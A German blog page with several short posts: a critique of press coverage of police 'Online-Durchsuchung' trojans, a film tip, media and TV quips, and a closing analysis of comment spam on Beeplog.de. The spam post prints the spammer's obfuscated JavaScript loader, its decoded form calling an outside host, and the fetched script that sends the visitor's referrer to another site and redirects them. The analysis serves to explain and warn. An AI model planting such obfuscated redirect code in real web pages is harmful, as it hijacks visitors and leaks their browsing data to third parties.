Beiträge

Veröffentlicht am

Schwierige Online-Durchsuchung

Lutz Herkner beleuchtet für Zeit Online die technischen Schwierigkeiten der Onlinedurchsuchung. Er wirft dabei sehr wichtige Punkte auf, irrt meines Erachtens aber auch in einigen Details.

Also bleibt nur der kontrollierte Angriff auf den einzelnen Rechner – doch der birgt ein gewaltiges Problem. Jedes Ziel im Internet wird nämlich über eine so genannte IP-Adresse angesprochen, sei es nun ein Computer oder eine Webseite. ZEIT online beispielsweise ist unter der IP-Adresse 217.13.68.162 erreichbar.

Es ist sogar noch schlimmer. Ein Großteil der Breitband-Anschlüsse hängt hinter so genannten Routern, die den Anschluss mehrerer Rechner erlauben. Dazu wird die IP-Adresse, die man von seinem Provider erhält, sozusagen aufgesplittet. Greift das BKA eine öffentliche IP-Adresse an, muss es erst Mal durch den Router kommen. Das ist prinzipiell möglich, aber es potenziert die Schwierigkeiten noch.

Das wiederum würde einen direkten Zugriff auf die Datenbanken der Internetprovider erfordern, was diese quasi zu Erfüllungsgehilfen der staatlichen Hacker machen würde – aus juristischer und technischer Sicht etwas ganz anderes als beispielsweise die passive Überwachung von E-Mails.

Ganz meine Rede.

Umso wahrscheinlicher wird es, dass sich Schäubles Schnüffler direkt beim Provider in die Internetverbindung einklinken und diese manipulieren. »Beim Download einer Datei wie etwa dem automatischen Update von Windows ließe sich die übertragene Datei problemlos mit dem Trojaner infizieren«, sagt Thilo Weichert, Leiter des Unabhängigen Landeszentrums für Datenschutz Schleswig-Holstein (ULD). Da die Provider bereits 2005 Hardware zur umgehenden Überwachung von E-Mails an ihre Systeme anschließen mussten, dürfte die Umrüstung auf derlei Maßnahmen unproblematisch vonstattengehen.

Das hingegen ist meines Erachtens falsch. Denn die meisten Update-Routinen überprüfen die Updates auf Übertragungsfehler. Schiebt man Windows Update einfach einen Trojaner unter, wird der schlicht nicht installiert werden. Auch die Installation beim Provider ist eben nicht trivial, die SINA-Boxen sind dazu schon mal nicht geeignet. Hinzu kommt das Problem, einen bestimmten Kunden direkt nach dem Einwählen zu identifizieren und dessen Datenverkehr umzuleiten. Und die juristische Hürde für einen solchen Eingriff in Telekommunikation ist auch sehr hoch.

Ein anderer Irrtum ist, dass die Online-Durchsuchung tatsächlich auch online in Gang gesetzt werden muss. Viel einfacher ist es den Zielrechner mit Hilfe von V-Leuten zu infizieren, wie es ja wohl schon gemacht wurde.

PS: Grade habe ich Rückmeldung aus dem Hause Microsoft bekommen: die Validität der Windows-Updates wird durch einen Hash-Wert sichergestellt, der durch einen Public-Private-Key kryptographisch signiert ist. Insofern ist es nicht ganz einfach dem Windows-Update etwas Falsches unterzuschieben – selbst durch eine Echtzeit-Manipulation des Datenstroms.

Veröffentlicht am

Filmtipp für Posener & Diekmann

Wie man sich in Verlagen schlägt und wieder verträgt zeigt ein Klassiker, der grade auf RBB läuft. Die Frau von der man spricht – auch bekannt als „Woman of the Year“.

Der Anfang des Films verläuft so: Die berühmte Politik-Redakteurin Tess Harding (Katherine Hepburn) fordert im Radio zum Unwillen des Sport-Redakteurs Sam Craig (Spencer Tracy) den Baseball abzuschaffen um die Kriegsbemühungen zu unterstützen (wir schreiben das Jahr 1942). Sam bedankt sich in seiner täglichen Sport-Kolumne, in der er seine Kollegin vom anderen Ressort „Vorzeigefrau aller Snobs“ nennt. Tess bedankt sich auf ähnliche Weise in ihrer eigenen Kolumne. Beide werden zum Chefredakteur bestellt, sie schließen Frieden – ein wenig Streit ist gut, aber man will ja das eigene Nest nicht beschmutzen. Keiner droht damit die Kolumnen der bewährten Textarbeiter nur noch auf auf Bewährung zuzulassen. Vorbildlich, nicht?

Ach ja: die beiden heiraten wenig später. Im aktuellen Streitfall wäre das aber wohl zuviel verlangt.

Veröffentlicht am

In2Revolution

Die FAZ hat mit den Geld-oder-Leben-Revolutionären gesprochen:

Elena erzählt, dass sie früher mal bei den Grünen war. Lange hat sie es dort nicht ausgehalten: „Die haben eigentlich immer nur über sich selbst debattiert.“ Johannes und Holger wollen sich parteipolitisch ohnehin nicht binden, denn das seien auch nur „Institutionen des bestehenden Systems“. Ihr eigener Zusammenschluss „Geld oder Leben“ sei schon aus diesem Grund keine feste Organisation, sondern eher ein Debattierklub ähnlich gesinnter Jugendlicher aus ganz Deutschland. Gewalt lehnen sie alle kategorisch ab. Aber wie ein Staat wie die Bundesrepublik überhaupt aufgebaut sein sollte, um der Sehnsucht dieser vier durchaus intelligenten jungen Leute nach mehr Nestwärme und Menschlichkeit zu entsprechen, bleibt letztlich ein großes Rätsel.
[…]
Holger ist 22 Jahre alt und studiert in Berlin Sozialwissenschaften. Wenn er nicht gerade den Reichstag stürmt oder über Politik diskutiert, spielt er gerne Gitarre. Mit seinen schulterlangen Haaren und den feinen Gesichtszügen wäre er in jeder Band der Schwarm aller Mädchen. Heute trägt er Ringelpulli und an den Füßen Socken in unterschiedlichen Farben. Er sagt: „Es ist doch schräg, dass sich an den Schulen heute alles nur um die richtigen Jeans oder um Markenturnschuhe dreht.“ Sein Mitbewohner Johannes ist auch 22 und studiert Physik – wie Claas (22) und Elena (21). Er hat dunkle, wache Augen, ein paar Bartstoppeln stehen ihm im Gesicht, und wenn er redet, findet er immer gleich die richtigen Worte.

Mal ehrlich: welche Parfümmarke soll nun beworben werden? Oder ist es die INSM?

Ich sehe die Storyline schon vor mir: Elena lernt diesen knuffigen Lateinamerikaner kennen, der ihr die Augen öffnet, wie linke Politik die Dritte Welt ruiniert. Und Johannes, Holger und Claas wollen die Politikszene erkunden, fühlen sich aber von Attac und Linkspartei abgestoßen und enttäuscht. Als ihr Freund Eduardo dann von finsteren Nazis verfolgt wird, tritt plötzlich Björn auf den Plan, der die Nazis vertreibt und rein zufällig für eine dieser tollen Gruppen arbeitet, wo noch echte Kreativität gefragt ist. Für die gute Sache. Bei den Jungen Liberalen.

Natürlich ist das billige Polemik: aber wer erst das Maul ganz groß aufreißt und dann schließlich nur Pseudo-Lyrik und Pseudo-Standpunkte absondert, wird nichts bewegen und will wahrscheinlich nicht mal etwas bewegen.

Johannes: „Mit dieser Aktion haben wir ja politische Verantwortung übernommen!“ Das soll es schon gewesen sein? Holger: „Es war zumindest ein Zeichen, jetzt wollen wir den Diskurs fortsetzen und eine Bewegung schaffen.“ Was für eine Bewegung? Elena: „Das ist im Moment noch nicht ganz klar.“

Flash-Mob statt Politik.

Veröffentlicht am

TV-Konsequenz

Wenn man vier Mülltonnen für Verpackung, Papier, Glas und Restmüll hat, kann man auch vier Fernseher haben.

Veröffentlicht am

Schmocher

Ein Glück, dass ich Harald Schmidt endgültig aufgegeben habe, als er mit der blöden MediaMarkt-Werbung begonnen hat, die zudem einen bis dahin schönen Rio-Reiser-Song schändete. Wie übel es um seine Show steht, enthüllt die Netzeitung exklusiv:

«Harald Schmidt» hatten im ersten Quartal dieses Jahres laut ARD durchschnittlich 1,32 Zuschauer ab drei Jahren verfolgt.

Das Praktische daran: Ob Schmidt in Zukunft mit Oliver Pocher oder Atze Schröder auftritt, interessiert mich kaum noch. Wer in seinem Blog einen dem Anlass entsprechend originellen Bild-Kommentar hinterlassen will, kann sich ja hier oder hier bedienen.

Veröffentlicht am

Vorsicht: koffeinfrei

Wenn das Nescafe-Glas einen roten Deckel hat, ist kein Koffein drin. Die Warnfarbe hätte mir eigentlich eine unschöne Überraschung ersparen können.

Veröffentlicht am

Camp oder Bar?

Das nächste Barcamp ist angesetzt und will seinem Namen alle Ehre machen. Zum Übernachten wird die Option „Campen“ genannt. Ich hingegen würde gerne den anderen Namensbestandteil in Erinnerung rufen: können wir stattdessen nicht in einer Bar übernachten?

Veröffentlicht am

Die edlen Gumballer

In einem Blog-Posting kündigt das „Team Polizei“ großherzig an, eine Spende von 10000 Dollar für die jüngsten Opfer des illegalen Straßenrennens Gumball an.

Bei Google wirbt das gleiche Team mit dieser Anzeige:

gum-google.jpg

Natürlich sind sie nur „wanted“ weil ihre Ladeklappe nicht TÜV-geprüft ist und nicht etwa weil sie rücksichtslos Menschenleben gefährden…

Veröffentlicht am

Spam per Beeplog – eine kleine Spurensuche

In letzter Zeit ist mir mehrmals Kommentarspam aufgefallen, der die deutsche Adresse Beeplog.de verlinkt. Wenn ich die Links anklicke, lande ich merkwürdigerweise auf einer Google-Ergebnis-Seite.

Wie funktioniert das? Nehmen wir als Beispiel den Spam vorn heute: http:// kidney-stones. beeplog. de (die URLs habe ich in diesem Beitrag deaktiviert).

Wenn man die Seite mit ausgeschaltetem JavaScript ansurft, landet man auf einer ziemlich leeren Beeplog-Seite ohne Einträge, aber mit massig Links in der Sidebar. Schaut man in den Quelltext, stößt man schnell auf folgendes JavaScript:

script language="JavaScript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%72%75%67%2D%70%72%65%73%63%72%69%70%74%69%6F%6E%2E%6F%72%67%2F%6A%2E%70%68%70%3F%71%3D%6B%69%64%6E%65%79%25%32%30%73%74%6F%6E%65%73%22%3E%3C%2F%73%63%72%69%70%74%3E'))

Sprich: es ist ein kleines kodiertes Programm, das im Browser ausgeführt wird. Im Klartext sieht das dann so aus:

script language="JavaScript" type="text/javascript" src="http://drug-prescription.org/ j.php?q=kidney%20stones">

Sprich: Das entschlüsselte JavaScript wird direkt ausgeführt und holt weitere Anweisungen von einer externen Seite. Die sehen so aus:

var f =''; var url = ''; f = ref(); if (top != self){ url = 'http://people-say.info/ search.php?q=kidney stones&f=' + f; } else{ if (url == '' && f != '') url = filter(); else url = 'http://www.google.com/ search?hl=en&q=kidney stones'; } if (typeof(location.replace) != 'undefined') top.location.replace(url); else top.location.href = url; function filter(){ if (f.indexOf('.live.')!=-1 || f.indexOf('.google.')!=-1 || f.indexOf('.msn.')!=-1 || f.indexOf('.yahoo.')!=-1 || f.indexOf('.aol.')!=-1 || f.indexOf('.ask.')!=-1 || f.indexOf('.altavista.')!=-1 || f.indexOf('.all.')!=-1 || f.indexOf('.nigma.')!=-1 || f.indexOf('.dogpile.')!=-1 || f.indexOf('.metacrawler.')!=-1 || f.indexOf('meta.')!=-1 || f.indexOf('.yandex.')!=-1 || f.indexOf('.rambler.')!=-1 || f.indexOf('.webalta.')!=-1 || f.indexOf('.live.')!=-1) return 'http://people-say.info/ search.php?q=kidney stones&f='+ f; else return 'http://www.google.com/ search?hl=en&q=kidney stones'; } function ref(){ if (top == self) f = top.document.referrer; if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined")) if (document["parent"] != null) if (parent["document"] != null) // ACCESS ERROR HERE! if (parent.document["referrer"] != null) if (typeof(parent.document) == "object") f = parent.document.referrer; if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined")) if (document["referrer"] != null) f = document.referrer; if ((f == "") || (f == "[unknown origin]") || (f == "unknown") || (f == "undefined")) f = ""; f = escape(f); return f; }

Flüchtig betrachtet kontrolliert das Script welche Ergebnisseiten verschiedene Suchmaschinen für die entsprechenden Suchbegriffe ausgeben - und dann wird der User eben dahin geleitet. Der Spammer vertraut darauf, dass eine ausreichende Anzahl der Leute schon auf den richtigen Google-Link klicken wird. Und wenn Google ihn aus dem Index schmeißt, kann er ja den User noch auf andere Seiten umleiten.

Wie könnte man abhelfen? Beeplog.de müsste seine Blogs etwas sorgfältiger beobachten und einige JavaScript-Funktionen außer Kraft setzen. Der User könnte JavaScript deaktivieren - was heute illusorisch ist - oder schlichtweg drauf achten, nicht auf solche Spam-Links zu klicken.